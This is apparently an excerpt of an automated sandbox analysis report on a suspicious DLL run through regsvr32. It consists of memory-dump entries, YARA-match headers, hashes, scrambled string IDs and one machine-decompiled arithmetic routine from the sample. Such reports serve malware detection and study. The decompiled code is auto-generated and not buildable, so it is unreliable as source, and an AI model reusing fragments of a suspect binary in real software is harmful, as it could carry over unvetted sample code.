                                                                      0x1800439c6
                                                                      0x1800439d2
                                                                      0x1800439d9
                                                                      0x1800439e0
                                                                      0x1800439ee
                                                                      0x1800439f4
                                                                      0x1800439fc
                                                                      0x180043a00
                                                                      0x180043a04
                                                                      0x180043a08
                                                                      0x180043a0c
                                                                      0x180043a10
                                                                      0x180043a21
                                                                      0x180043a27
                                                                      0x180043a2d
                                                                      0x180043a34
                                                                      0x180043a37
                                                                      0x180043a40
                                                                      0x180043a46
                                                                      0x180043a4c
                                                                      0x180043a53
                                                                      0x180043a59
                                                                      0x180043a5f
                                                                      0x180043a65
                                                                      0x180043a6c
                                                                      0x180043a74
                                                                      0x180043a7c
                                                                      0x180043a81
                                                                      0x180043a8c
                                                                      0x180043a93
                                                                      0x180043a9a
                                                                      0x180043a9f
                                                                      0x180043aa1
                                                                      0x180043aa4
                                                                      0x180043aa9
                                                                      0x180043aad
                                                                      0x180043ab2
                                                                      0x180043abd
                                                                      0x180043ac2
                                                                      0x180043ac7
                                                                      0x180043acc
                                                                      0x180043ad1
                                                                      0x180043ae2
                                                                      0x180043ae8
                                                                      0x180043aed
                                                                      0x180043b06
                                                                      0x180043b16
                                                                      0x180043b16
                                                                      0x180043b1a
                                                                      0x180043b22
                                                                      0x180043b2d
                                                                      0x180043b34
                                                                      0x180043b3b
                                                                      0x180043b41
                                                                      0x180043b46
                                                                      0x180043b4e
                                                                      0x180043b59
                                                                      0x180043b60
                                                                      0x180043b88

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$CloseFile$FirstNext
                                                                      • String ID: C:\Windows\SYSTEM32\regsvr32.exe
                                                                      • API String ID: 1164774033-3569719448
                                                                      • Opcode ID: f1931568d5a33fc77265ef513eb123ac4b5e562fba2f996f70bc219744be925d
                                                                      • Instruction ID: 9708372230325967be565ac46e66e113bf2e334e3a5df2b577efa4fbc3f291a7
                                                                      • Opcode Fuzzy Hash: f1931568d5a33fc77265ef513eb123ac4b5e562fba2f996f70bc219744be925d
                                                                      • Instruction Fuzzy Hash: 96A13832704BC849FBA2CB3598863ED6BA0E349BD8F15D115BE8827695CF38C649C744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$ E$*Q$RpU$z&$|j0
                                                                      • API String ID: 0-265612657
                                                                      • Opcode ID: 15496024a8776751db64faef2d55a27c0d2f53435d2218d1abece8b041186ee8
                                                                      • Instruction ID: cc03c6e0223ed8bc7238326544b312ec01422b4815cb825e8d6975cf2bea434a
                                                                      • Opcode Fuzzy Hash: 15496024a8776751db64faef2d55a27c0d2f53435d2218d1abece8b041186ee8
                                                                      • Instruction Fuzzy Hash: D9520374908B48CFD768CF79C58945EBBF1FB88708F204A1DE6A697260DB749846CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +'$+'$Tp3k$_'($t$$x{1
                                                                      • API String ID: 0-3900201606
                                                                      • Opcode ID: 3c2d783914c016690860141590351fc24aadef83a23d3a5ff2ee42430e827fd6
                                                                      • Instruction ID: c8fc9642869175d2d54fe98a17b8244de7d164089b630aebad8d93d3124735ed
                                                                      • Opcode Fuzzy Hash: 3c2d783914c016690860141590351fc24aadef83a23d3a5ff2ee42430e827fd6
                                                                      • Instruction Fuzzy Hash: DF12F675A04749EFCB58DF68C08A98EBBF2FF44348F408569E84AEB210D770DA59CB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #.$#.$?mM$raP$s$v
                                                                      • API String ID: 0-320173026
                                                                      • Opcode ID: d2e20320fa59b0ba8636b007d5ca2552199664776c105e10e16ccd0e01782c40
                                                                      • Instruction ID: a4962761f106afbdba0da741b4b4b3aef60a4fd670d0de02f4e6675cbdccdd24
                                                                      • Opcode Fuzzy Hash: d2e20320fa59b0ba8636b007d5ca2552199664776c105e10e16ccd0e01782c40
                                                                      • Instruction Fuzzy Hash: 83B1027461468CEBCF98CF28C8DA99D3BA1FB44398F906229FD0687250D779D895CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E0000000118004B940(signed int __ecx, signed int __rax, signed int* __rcx, unsigned int __rdx, signed int __r9, void* __r10, long long __r13, signed int _a8, long long _a16, signed int _a24, signed int _a32) {
                                                                      				long long _v64;
                                                                      				char _v532;
                                                                      				intOrPtr _v536;
                                                                      				signed long long _v552;
                                                                      				signed int _v560;
                                                                      				signed int _v568;
                                                                      				signed int _v572;
                                                                      				signed int _v576;
                                                                      				intOrPtr _v584;
                                                                      				void* __rbx;
                                                                      				void* __rsi;
                                                                      				void* _t132;
                                                                      				signed int _t148;
                                                                      				intOrPtr _t161;
                                                                      				signed int _t163;
                                                                      				intOrPtr _t164;
                                                                      				signed int _t180;
                                                                      				signed int _t191;
                                                                      				signed int _t192;
                                                                      				signed int _t213;
                                                                      				void* _t230;
                                                                      				signed long long _t241;
                                                                      				signed int _t244;
                                                                      				void* _t252;
                                                                      				signed int* _t255;
                                                                      				intOrPtr* _t262;
                                                                      				signed long long _t267;
                                                                      				signed long long _t269;
                                                                      				signed long long _t271;
                                                                      				signed long long _t273;
                                                                      				signed long long _t277;
                                                                      				signed long long _t279;
                                                                      				char* _t285;
                                                                      				signed int _t288;
                                                                      				signed long long _t289;
                                                                      				signed long long _t297;
                                                                      				signed long long _t298;
                                                                      				void* _t306;
                                                                      				signed long long _t327;
                                                                      
                                                                      				_a16 = __rdx;
                                                                      				r10d =  *__rcx;
                                                                      				if (r10d == 0) goto 0x8004bdb5;
                                                                      				_t161 =  *__rdx;
                                                                      				_v584 = _t161;
                                                                      				if (_t161 == 0) goto 0x8004bdb5;
                                                                      				r10d = r10d - 1;
                                                                      				if (_t252 - 1 != 0) goto 0x8004ba71;
                                                                      				r12d =  *(__rdx + 4);
                                                                      				if (r12d != 1) goto 0x8004b9b6;
                                                                      				_t255 =  &(__rcx[1]);
                                                                      				 *__rcx = 0;
                                                                      				r9d = 0;
                                                                      				_v536 = 0;
                                                                      				E00000001180049864(0x1cc, __rax, _t252, _t255, __rdx, __rcx,  &_v532, __r9);
                                                                      				goto 0x8004bdb7;
                                                                      				if (r10d != 0) goto 0x8004b9f1;
                                                                      				_t163 = _t255[1];
                                                                      				 *_t255 = 0;
                                                                      				r9d = 0;
                                                                      				_v536 = 0;
                                                                      				E00000001180049864(0x1cc, __rax, _t252,  &(_t255[1]), __rdx, __rcx,  &_v532, __r9);
                                                                      				_t180 = _t163 % r12d;
                                                                      				__rcx[1] = _t180;
                                                                      				bpl = _t180 != 0;
                                                                      				 *__rcx = 0;
                                                                      				goto 0x8004bdb7;
                                                                      				r15d = 0xffffffff;
                                                                      				if (r10d == r15d) goto 0x8004ba35;
                                                                      				asm("o16 nop [eax+eax]");
                                                                      				r10d = r10d + r15d;
                                                                      				if (r10d != r15d) goto 0x8004ba10;
                                                                      				r9d = 0;
                                                                      				_v536 = 0;
                                                                      				_t285 =  &_v532;
                                                                      				 *__rcx = 0;
                                                                      				_t132 = E00000001180049864(0x1cc, __rax | _t279 << 0x00000020, _t252,  &(__rcx[1]), __rdx, __rcx, _t285, __r9);
                                                                      				__rcx[1] = r14d;
                                                                      				__rcx[2] = __ecx;
                                                                      				bpl = __ecx != 0;
                                                                      				 *__rcx = 1;
                                                                      				goto 0x8004bdb7;
                                                                      				if (_t132 - r10d > 0) goto 0x8004bdb5;
                                                                      				r8d = r10d;
                                                                      				_t269 = r10d;
                                                                      				r8d = r8d - _t132;
                                                                      				r9d = r10d;
                                                                      				_t277 = r8d;
                                                                      				if (_t269 - _t277 < 0) goto 0x8004bad7;
                                                                      				_t262 = (__rdx >> 0x20) + 4 + _t269 * 4;
                                                                      				if ( *((intOrPtr*)(__rdx - _t277 * 4 - __rcx + _t262)) !=  *_t262) goto 0x8004bac0;
                                                                      				r9d = r9d - 1;
                                                                      				if (_t269 - 1 - _t277 >= 0) goto 0x8004baa7;
                                                                      				goto 0x8004bad7;
                                                                      				_t271 = r9d - r8d;
                                                                      				_t241 = r9d;
                                                                      				if ( *((intOrPtr*)(__rdx + 4 + _t271 * 4)) -  *(__rcx + 4 + _t241 * 4) >= 0) goto 0x8004bada;
                                                                      				r8d = r8d + 1;
                                                                      				_t213 = r8d;
                                                                      				if (_t213 == 0) goto 0x8004bdb5;
                                                                      				r9d =  *(__rdx + 4 + _t241 * 4);
                                                                      				r11d =  *(__rdx + 4 + _t241 * 4);
                                                                      				asm("inc ecx");
                                                                      				_a24 = r11d;
                                                                      				if (_t213 == 0) goto 0x8004bb21;
                                                                      				r12d = 0x20;
                                                                      				r12d = r12d - 0x1f;
                                                                      				_a8 = r12d;
                                                                      				if (0x1f - _t252 - 2 == 0) goto 0x8004bb6d;
                                                                      				goto 0x8004bb30;
                                                                      				_a8 = 0;
                                                                      				r12d = 0;
                                                                      				r9d = r11d >> r12d;
                                                                      				r11d = r11d << 0x20;
                                                                      				r9d = r9d | r9d << 0x00000020;
                                                                      				_a24 = r11d;
                                                                      				if (_t163 - 2 <= 0) goto 0x8004bb6d;
                                                                      				r11d = r11d |  *(__rdx + 4 + _t241 * 4) >> r12d;
                                                                      				_a24 = r11d;
                                                                      				r14d = _t285 - 1;
                                                                      				_v560 = _t279;
                                                                      				if (r14d < 0) goto 0x8004bd7e;
                                                                      				r15d = 0xffffffff;
                                                                      				_v64 = __r13;
                                                                      				r13d = __rdx + _t252;
                                                                      				_v552 = _t241;
                                                                      				_v568 = __r9;
                                                                      				if (r13d - r10d > 0) goto 0x8004bbad;
                                                                      				goto 0x8004bbaf;
                                                                      				_a32 = 0;
                                                                      				r11d =  *(__rcx + 4 + _t241 * 4);
                                                                      				_v576 = _t262 - 4;
                                                                      				_v572 = 0;
                                                                      				if (0x20 == 0) goto 0x8004bc07;
                                                                      				r8d = r11d;
                                                                      				r11d = r11d << 0x20;
                                                                      				if (r13d - 3 < 0) goto 0x8004bc0c;
                                                                      				_t148 =  *(__rcx + 4 + (_v576 << 0x20) * 4) >> r12d;
                                                                      				r11d = r11d | _t148;
                                                                      				goto 0x8004bc0c;
                                                                      				_t288 = _v576;
                                                                      				_t244 = _t288;
                                                                      				r8d = _t148 % __r9;
                                                                      				if (_t244 - _t327 <= 0) goto 0x8004bc38;
                                                                      				_t297 = _t327;
                                                                      				_t289 = _t288 + 0x1;
                                                                      				if (_t289 - _t327 > 0) goto 0x8004bc71;
                                                                      				_t267 = _t289 << 0x00000020 | _t279;
                                                                      				if (0x1 - _t267 <= 0) goto 0x8004bc6d;
                                                                      				_t298 = _t297 - 1;
                                                                      				if (_t289 + _v568 - _t327 <= 0) goto 0x8004bc50;
                                                                      				_t164 = _v584;
                                                                      				if (_t298 == 0) goto 0x8004bd50;
                                                                      				r11d = 0;
                                                                      				if (_t164 == 0) goto 0x8004bcf3;
                                                                      				r15d = _a8;
                                                                      				r8d = r10d;
                                                                      				_t306 =  >=  ? _t279 + 0x1 >> 0x20 : (_t279 + 0x1 >> 0x20) + 1;
                                                                      				r11d = r11d + 1;
                                                                      				 *((intOrPtr*)(__rcx + 4 + _t267 * 4)) = __rcx[0xffffffff00000002] - r8d;
                                                                      				if (r11d - _t164 < 0) goto 0x8004bca0;
                                                                      				_a8 = r15d;
                                                                      				r15d = 0xffffffff;
                                                                      				r12d = _a8;
                                                                      				if (0x1 - _t306 >= 0) goto 0x8004bd4c;
                                                                      				r10d = 0;
                                                                      				if (_t164 == 0) goto 0x8004bd49;
                                                                      				asm("o16 nop [eax+eax]");
                                                                      				r10d = r10d + 1;
                                                                      				_t273 =  &(__rcx[0xffffffff00000001]);
                                                                      				 *(_t273 + 4) = r8d;
                                                                      				_t230 = r10d - _t164;
                                                                      				if (_t230 < 0) goto 0x8004bd20;
                                                                      				r10d = __r13 - 1;
                                                                      				r13d = r13d - 1;
                                                                      				r14d = r14d - 1;
                                                                      				_v560 = (_v560 << 0x20) + 0x1;
                                                                      				if (_t230 >= 0) goto 0x8004bba1;
                                                                      				_t191 = _t306 + 1;
                                                                      				if (_t191 -  *__rcx >= 0) goto 0x8004bd9c;
                                                                      				 *((intOrPtr*)(__rcx + 4 + ((0x1 + _t244) * _v568 * _t297 - _t271) * _t298 * 4)) = 0;
                                                                      				if (_t191 + 1 -  *__rcx < 0) goto 0x8004bd90;
                                                                      				 *__rcx = _t191;
                                                                      				if (_t191 == 0) goto 0x8004bdb0;
                                                                      				_t192 = _t191 - 1;
                                                                      				if ( *((intOrPtr*)(__rcx + 4 + _t273 * 4)) != 0) goto 0x8004bdb0;
                                                                      				 *__rcx = _t192;
                                                                      				if (_t192 != 0) goto 0x8004bda2;
                                                                      				goto 0x8004bdb7;
                                                                      				return 0;
                                                                      			}










































                                                                      0x18004b940
                                                                      0x18004b956
                                                                      0x18004b962
                                                                      0x18004b968
                                                                      0x18004b96a
                                                                      0x18004b970
                                                                      0x18004b976
                                                                      0x18004b97e
                                                                      0x18004b984
                                                                      0x18004b98e
                                                                      0x18004b998
                                                                      0x18004b99c
                                                                      0x18004b99e
                                                                      0x18004b9a1
                                                                      0x18004b9aa
                                                                      0x18004b9b1
                                                                      0x18004b9b9
                                                                      0x18004b9bb
                                                                      0x18004b9c3
                                                                      0x18004b9c5
                                                                      0x18004b9cc
                                                                      0x18004b9d5
                                                                      0x18004b9de
                                                                      0x18004b9e3
                                                                      0x18004b9e6
                                                                      0x18004b9ea
                                                                      0x18004b9ec
                                                                      0x18004b9f1
                                                                      0x18004ba00
                                                                      0x18004ba05
                                                                      0x18004ba1b
                                                                      0x18004ba33
                                                                      0x18004ba35
                                                                      0x18004ba38
                                                                      0x18004ba3c
                                                                      0x18004ba41
                                                                      0x18004ba4c
                                                                      0x18004ba54
                                                                      0x18004ba61
                                                                      0x18004ba64
                                                                      0x18004ba6a
                                                                      0x18004ba6c
                                                                      0x18004ba74
                                                                      0x18004ba7a
                                                                      0x18004ba7d
                                                                      0x18004ba80
                                                                      0x18004ba83
                                                                      0x18004ba86
                                                                      0x18004ba8c
                                                                      0x18004baa3
                                                                      0x18004baad
                                                                      0x18004baaf
                                                                      0x18004babc
                                                                      0x18004babe
                                                                      0x18004bac6
                                                                      0x18004bac9
                                                                      0x18004bad5
                                                                      0x18004bad7
                                                                      0x18004bada
                                                                      0x18004badd
                                                                      0x18004bae8
                                                                      0x18004baf0
                                                                      0x18004baf5
                                                                      0x18004baf9
                                                                      0x18004bb01
                                                                      0x18004bb08
                                                                      0x18004bb10
                                                                      0x18004bb13
                                                                      0x18004bb1d
                                                                      0x18004bb1f
                                                                      0x18004bb26
                                                                      0x18004bb2d
                                                                      0x18004bb3f
                                                                      0x18004bb42
                                                                      0x18004bb45
                                                                      0x18004bb48
                                                                      0x18004bb53
                                                                      0x18004bb62
                                                                      0x18004bb65
                                                                      0x18004bb6d
                                                                      0x18004bb71
                                                                      0x18004bb7c
                                                                      0x18004bb85
                                                                      0x18004bb8b
                                                                      0x18004bb93
                                                                      0x18004bb97
                                                                      0x18004bb9c
                                                                      0x18004bba4
                                                                      0x18004bbab
                                                                      0x18004bbaf
                                                                      0x18004bbc2
                                                                      0x18004bbc7
                                                                      0x18004bbcc
                                                                      0x18004bbd2
                                                                      0x18004bbd9
                                                                      0x18004bbec
                                                                      0x18004bbf3
                                                                      0x18004bc00
                                                                      0x18004bc02
                                                                      0x18004bc05
                                                                      0x18004bc07
                                                                      0x18004bc0e
                                                                      0x18004bc14
                                                                      0x18004bc1d
                                                                      0x18004bc2c
                                                                      0x18004bc35
                                                                      0x18004bc3b
                                                                      0x18004bc57
                                                                      0x18004bc5d
                                                                      0x18004bc5f
                                                                      0x18004bc6b
                                                                      0x18004bc6d
                                                                      0x18004bc74
                                                                      0x18004bc7d
                                                                      0x18004bc82
                                                                      0x18004bc8c
                                                                      0x18004bcb4
                                                                      0x18004bcca
                                                                      0x18004bcd1
                                                                      0x18004bcd4
                                                                      0x18004bcdb
                                                                      0x18004bcdd
                                                                      0x18004bce5
                                                                      0x18004bceb
                                                                      0x18004bcfd
                                                                      0x18004bcff
                                                                      0x18004bd04
                                                                      0x18004bd15
                                                                      0x18004bd24
                                                                      0x18004bd2b
                                                                      0x18004bd3c
                                                                      0x18004bd44
                                                                      0x18004bd47
                                                                      0x18004bd4c
                                                                      0x18004bd55
                                                                      0x18004bd67
                                                                      0x18004bd6b
                                                                      0x18004bd70
                                                                      0x18004bd7e
                                                                      0x18004bd86
                                                                      0x18004bd94
                                                                      0x18004bd9a
                                                                      0x18004bd9c
                                                                      0x18004bda0
                                                                      0x18004bda2
                                                                      0x18004bda8
                                                                      0x18004bdaa
                                                                      0x18004bdae
                                                                      0x18004bdb3
                                                                      0x18004bdc8

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1502251526-3916222277
                                                                      • Opcode ID: 420c5f3a5b829d016a4e8e280d33f932fa302bb843d319232aed1a0b3bd2c630
                                                                      • Instruction ID: b14901d852472aa3b01b571d25ec3945b7a9f974d04a562c1bbb1c61760d8801
                                                                      • Opcode Fuzzy Hash: 420c5f3a5b829d016a4e8e280d33f932fa302bb843d319232aed1a0b3bd2c630
                                                                      • Instruction Fuzzy Hash: F5C1F672715A8987D7A5CF29E0C8B9AB791F3887C8F46C125EB4687B44DF38D909CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %a$7-'$@$LOs$nLA
                                                                      • API String ID: 0-2759765789
                                                                      • Opcode ID: 7b99f25df26d43ddedc3d8ae58260cab44a22e199b0ed6fd502f0b015764c6cc
                                                                      • Instruction ID: 6b966d74d04c8b5085d971cabd72a6ad3cf144f33d2d0f9a3a745a83c02ab05b
                                                                      • Opcode Fuzzy Hash: 7b99f25df26d43ddedc3d8ae58260cab44a22e199b0ed6fd502f0b015764c6cc
                                                                      • Instruction Fuzzy Hash: E472FE75A0670CCBCB68DF68C28A49D7BF1FF45308F105129EC6A9B261D774E829CB49
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$~$3J$3J$ZP9
                                                                      • API String ID: 0-2994819472
                                                                      • Opcode ID: c7011fcc20e0c726ce8e53e448dfe11e809d22838200fdd58a2d78323a219969
                                                                      • Instruction ID: 52e4f60e22bd2cb4ac22b9c8c6816576d1e0a1d0e60723289944d158f4da3e52
                                                                      • Opcode Fuzzy Hash: c7011fcc20e0c726ce8e53e448dfe11e809d22838200fdd58a2d78323a219969
                                                                      • Instruction Fuzzy Hash: 53021C7890560ECFCF18DFA8C09A9AEBBF2FF54348F104119D816AB261DBB4D615CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &4%$?0P$G<n$cd!*
                                                                      • API String ID: 0-1407771830
                                                                      • Opcode ID: 50368ffb7655ff82ae891980d4df8a38d197009cf562a91d9e8ef496bbae8d4f
                                                                      • Instruction ID: 9a0f978c5db5a251ced2d0223148eb33cd1bc79893413379d8ccf717d2193bdc
                                                                      • Opcode Fuzzy Hash: 50368ffb7655ff82ae891980d4df8a38d197009cf562a91d9e8ef496bbae8d4f
                                                                      • Instruction Fuzzy Hash: 2B720FB5A0634CCBCB68DF68C28A59D7BF1FF54308F10112DEC1A9A265D7B4D829CB49
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: fO^$wOI$yU$0
                                                                      • API String ID: 0-4091292863
                                                                      • Opcode ID: cf02816b98737d4808bf3deccea422558323f00bcb0eeddfd268aecd4ddc64bd
                                                                      • Instruction ID: a449d34047dbd083831104956a10f56bbe5efcab2ad0a16284adf4af04087c6b
                                                                      • Opcode Fuzzy Hash: cf02816b98737d4808bf3deccea422558323f00bcb0eeddfd268aecd4ddc64bd
                                                                      • Instruction Fuzzy Hash: 7F322775A08758CBCB78DFB8C04A49EBBF1FB85304F20461DE986A7252D7B59805CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %0?;$/a[$T$}
                                                                      • API String ID: 0-4085943656
                                                                      • Opcode ID: b51b1431075551fc567f73bb0db610f69d43de9628f7eaec897a5273c8122561
                                                                      • Instruction ID: c9c4fe22c3d653468200d5001b2ab285cff2c99e10accb6e3832a0f290c4d1ab
                                                                      • Opcode Fuzzy Hash: b51b1431075551fc567f73bb0db610f69d43de9628f7eaec897a5273c8122561
                                                                      • Instruction Fuzzy Hash: 60321BB4A153888BCBB8CF68C8996DD7BF1FB48318F90421DEA0A9F251DB745644CF19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +8]z$,Q$U#:$~
                                                                      • API String ID: 0-3710097356
                                                                      • Opcode ID: 9b58acff15e4468de4a02d853d8d4113bd51d3bdeb8be7aef169dc32ab6db4f3
                                                                      • Instruction ID: 7b5b6f04fe9f20ce6b8aaf462827a51b764bb8f3c6d9a6f0b2f6cb53370c67bb
                                                                      • Opcode Fuzzy Hash: 9b58acff15e4468de4a02d853d8d4113bd51d3bdeb8be7aef169dc32ab6db4f3
                                                                      • Instruction Fuzzy Hash: 2532E574144BCA8BCBB8CF24CC85BEF7BA1FB44306F145529989ECA251DBB897858F41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: S_U>$Tie$La$e}
                                                                      • API String ID: 0-619072304
                                                                      • Opcode ID: 6cfbe6dfe390b5b95187ea5285debdf316a1537c5c479555f9ba247462fe4075
                                                                      • Instruction ID: 27747c94a748979de1242541ff5ee273813844ed80c0ad41817682b5c7484d38
                                                                      • Opcode Fuzzy Hash: 6cfbe6dfe390b5b95187ea5285debdf316a1537c5c479555f9ba247462fe4075
                                                                      • Instruction Fuzzy Hash: D902E275504788DBCB9CCF68C8CA4993FA1FF44398FA05219FE068B664D7B5E885CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B'$I,$p_$p_
                                                                      • API String ID: 0-2498837536
                                                                      • Opcode ID: ff9e81fad55058037e2542ced9f87df2a23eba125669a962712813f1bb188595
                                                                      • Instruction ID: 869382a37561da70fb350a0a6d98aa9074fe37173f736afd9a48d55ad09df52f
                                                                      • Opcode Fuzzy Hash: ff9e81fad55058037e2542ced9f87df2a23eba125669a962712813f1bb188595
                                                                      • Instruction Fuzzy Hash: 8A913C796147989FCBB8CF28C8867DA7BA0FB46304F50511ADC8ECE351DB749A49CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "np$8x$K%+$d5%O
                                                                      • API String ID: 0-574413883
                                                                      • Opcode ID: 2f8691bb1349c81039d3a879bd194cf4fa3915208a1fcf6782b8e685836e6874
                                                                      • Instruction ID: ffd990eeb95ce05c0a10c4936fe62e32daf402a0ad45c30c2230fe449f04e209
                                                                      • Opcode Fuzzy Hash: 2f8691bb1349c81039d3a879bd194cf4fa3915208a1fcf6782b8e685836e6874
                                                                      • Instruction Fuzzy Hash: A8A1ACB490034A8FCB48CF68D48A59E7FB1FB68398F20421DFC169A260D370D6A5CBC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: a3E$h$pS$$mr
